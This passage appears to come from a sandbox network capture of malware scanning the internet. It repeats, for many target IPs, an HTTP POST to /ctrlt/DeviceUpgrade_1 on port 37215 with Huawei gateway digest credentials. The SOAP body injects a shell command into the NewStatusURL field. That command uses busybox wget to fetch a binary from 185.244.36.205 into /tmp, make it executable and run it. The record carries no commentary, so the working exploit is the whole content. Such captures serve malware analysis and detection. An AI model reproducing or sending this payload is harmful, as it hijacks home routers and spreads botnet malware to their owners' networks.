                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1783192.168.2.1549292157.215.205.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946619034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1784192.168.2.1545430190.203.70.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946657896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1785192.168.2.1556254121.42.88.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946681023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1786192.168.2.1553926190.34.187.15737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946697950 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1787192.168.2.1546506138.8.124.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946715117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1788192.168.2.1550920190.148.52.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946721077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1789192.168.2.1537890122.190.160.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946721077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1790192.168.2.154227837.225.39.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946743011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1791192.168.2.1556986181.20.83.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946780920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1792192.168.2.1555828156.150.218.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946789026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1793192.168.2.1544966102.116.5.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.946808100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
